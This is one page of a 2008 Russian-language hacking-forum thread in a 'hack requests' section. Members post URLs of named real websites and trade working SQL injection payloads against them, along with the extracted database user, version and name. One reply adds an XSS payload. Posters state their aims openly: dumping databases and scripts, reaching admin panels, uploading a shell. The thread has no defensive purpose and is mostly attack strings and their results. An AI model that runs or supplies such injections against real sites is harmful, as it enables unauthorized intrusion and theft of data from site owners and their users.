HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 18 из 41 « Первая < 8 14 15 16 17 18 19 20 21 22 28 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 30.01.2008, 15:49
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию
http://www.sticker.su/forum.php?sub_topics=true&main_topic_id=16

Подскажите, есть всё таки sql или нет? На кавычку даёт ошибку, а пытаюсь определить количество столбцов и не могу ни шиша, Заранее спасибо.
 

  #172  
Старый 30.01.2008, 15:56
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от Климент_Ворошилов  
http://www.sticker.su/forum.php?sub_topics=true&main_topic_id=16

Подскажите, есть всё таки sql или нет? На кавычку даёт ошибку, а пытаюсь определить количество столбцов и не могу ни шиша, Заранее спасибо.
есть http://www.sticker.su/forum.php?sub_topics=true&main_topic_id=16'%20and% 201=1/*

2c411k Все таки там 4 мускул, ascii(52)=4
поскольку мускул демократичен к типам вот так нагляднее
Код:
http://spec.proclub.ru/modules/tests/test/courses/course1.php?course=27'+and+(substring(version(),1,1))=4/*
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.01.2008 в 16:06..
 

  #173  
Старый 30.01.2008, 17:04
xXvladXx
Участник форума
Регистрация: 28.10.2007
Сообщений: 143
Провел на форуме:
913233

Репутация: 162
По умолчанию
Цитата:
http://personalica.com/search.php?s_i=1"
хелп плиз срочно надо БД слить и скрипты
 

  #174  
Старый 30.01.2008, 21:25
Mobile
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333

Репутация: 1564


Отправить сообщение для Mobile с помощью ICQ
По умолчанию
Цитата:
Сообщение от xXvladXx  
хелп плиз срочно надо БД слить и скрипты
там нет скули
 

  #175  
Старый 30.01.2008, 22:19
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию
вот тут есть. http://personalica.com/rating.php?mod=vote&age=0&sex=1+and+substring(vers ion(),1,1)=4
http://personalica.com/rating.php?mod=vote&age=0&sex=1%20union%20select%2 01,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from +mamba_fe_users/*
 

  #176  
Старый 30.01.2008, 22:26
xXvladXx
Участник форума
Регистрация: 28.10.2007
Сообщений: 143
Провел на форуме:
913233

Репутация: 162
По умолчанию
спасибо)
 

  #177  
Старый 01.02.2008, 15:34
2rist
Новичок
Регистрация: 05.01.2008
Сообщений: 6
Провел на форуме:
95091

Репутация: 3
Отправить сообщение для 2rist с помощью ICQ
По умолчанию
Не знаю уместны ли тут cgi скрипты...
Взгляните, можно ли из этого что-то толковое получить.

http://x-time.ru/cgi-bin/sonnik.cgi?act=char&val="+union+select+1,2/*
Последний раз редактировалось 2rist; 01.02.2008 в 16:46..
 

  #178  
Старый 01.02.2008, 15:43
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
ну тут версия 4.1.20 к mysql таблам доступа нет - значит надо перебирать таблицы ..
 

  #179  
Старый 01.02.2008, 15:43
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Код:
http://x-time.ru/cgi-bin/sonnik.cgi?act=char&val=%22+union+select+CONCAT(USER(),0x3a,VERSION(),0x3a,DATABASE()),NULL/*
Имя пользователя: chat@83.222.31.242
верси БД: 4.1.20
БД: chat

А что именно ты хочешь?

Гг, не к месту но и Пасивка есть:
Код:
http://x-time.ru/cgi-bin/sonnik.cgi?act=char&val=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E
Таблицы не смог подобрать =/
Последний раз редактировалось it's my; 01.02.2008 в 15:50..
 

  #180  
Старый 01.02.2008, 16:38
2rist
Новичок
Регистрация: 05.01.2008
Сообщений: 6
Провел на форуме:
95091

Репутация: 3
Отправить сообщение для 2rist с помощью ICQ
По умолчанию
Цитата:
Имя пользователя: chat@83.222.31.242
верси БД: 4.1.20
БД: chat
Это всё я тоже смог достать. И xss сразу нашёл ))
Цитата:
А что именно ты хочешь?
Желательно каким-нибудь образом, раскрутив эту sql-иньекцию, получить доступ к админке сайта или шелл залить.
Цитата:
Таблицы не смог подобрать =/
А пример запроса можешь показать, как таблицы подбирать.
Последний раз редактировалось 2rist; 01.02.2008 в 16:44..
 
 
Страница 18 из 41 « Первая < 8 14 15 16 17 18 19 20 21 22 28 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ